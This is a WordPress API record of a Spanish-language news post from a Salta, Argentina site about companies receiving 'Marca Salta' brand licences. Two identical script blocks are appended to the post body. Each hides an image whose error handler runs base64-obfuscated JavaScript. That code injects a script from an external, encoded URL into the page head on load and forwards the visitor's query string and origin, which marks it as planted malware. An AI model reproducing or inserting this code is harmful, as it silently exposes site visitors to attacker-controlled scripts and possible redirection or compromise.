{"id":5236,"date":"2025-06-06T11:51:28","date_gmt":"2025-06-06T14:51:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5236"},"modified":"2025-08-13T23:30:45","modified_gmt":"2025-08-14T02:30:45","slug":"empresas-y-emprendedores-accedieron-a-la-licencia-de-marca-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5236","title":{"rendered":"Empresas y emprendedores accedieron a la licencia de \u201cMarca Salta\u201d"},"content":{"rendered":"\n<p><strong><em>Este sello refuerza la identidad y promueve el posicionamiento de nuestros productos y servicios en mercados locales, nacionales e internacionales.<\/em><\/strong><\/p>\n\n\n\n<p>El Ministerio de Producci\u00f3n y Desarrollo Sustentable llevar\u00e1 a cabo el acto de entrega de los certificados de licencias de uso de la \u201cMarca Salta\u201d a empresas y emprendedores de diversos rubros, que alcanzaron cumplimentar con los requisitos establecidos. El evento ser\u00e1 encabezado por el ministro&nbsp;<strong>Mart\u00edn de los R\u00edos<\/strong>&nbsp;y tendr\u00e1 lugar el pr\u00f3ximo lunes 9 de junio a partir de las 10 en el Centro de Convenciones de Grand Bourg.<\/p>\n\n\n\n<p>El programa \u201cMarca Salta\u201d busca impulsar la producci\u00f3n salte\u00f1a, y posicionar productos regionales en los mercados locales, nacionales e internacionales. Este sello est\u00e1 dirigido a los productos cuyo proceso de transformaci\u00f3n de la materia prima se hace dentro de la provincia de Salta y cumplen con los criterios de calidad y origen salte\u00f1o. Adem\u00e1s, busca incentivar el consumo de producci\u00f3n local en Salta y generar un sentido de pertenencia con la producci\u00f3n salte\u00f1a.<\/p>\n\n\n\n<p>La Secretar\u00eda de Industria, Comercio y Empleo desarroll\u00f3 de manera permanente asistencia t\u00e9cnica para que estas empresas y emprendedores puedan acceder a la licencia de uso de la \u201cMarca Salta\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este sello refuerza la identidad y promueve el posicionamiento de nuestros productos y servicios en mercados locales, nacionales e internacionales. El Ministerio de Producci\u00f3n y Desarrollo Sustentable llevar\u00e1 a cabo el acto de entrega de los certificados de licencias de uso de la \u201cMarca Salta\u201d a empresas y emprendedores de diversos rubros, que alcanzaron cumplimentar [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5237,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20],"tags":[],"class_list":{"0":"post-5236","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5236"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5236"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5236\/revisions"}],"predecessor-version":[{"id":6468,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5236\/revisions\/6468"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5237"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5236"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}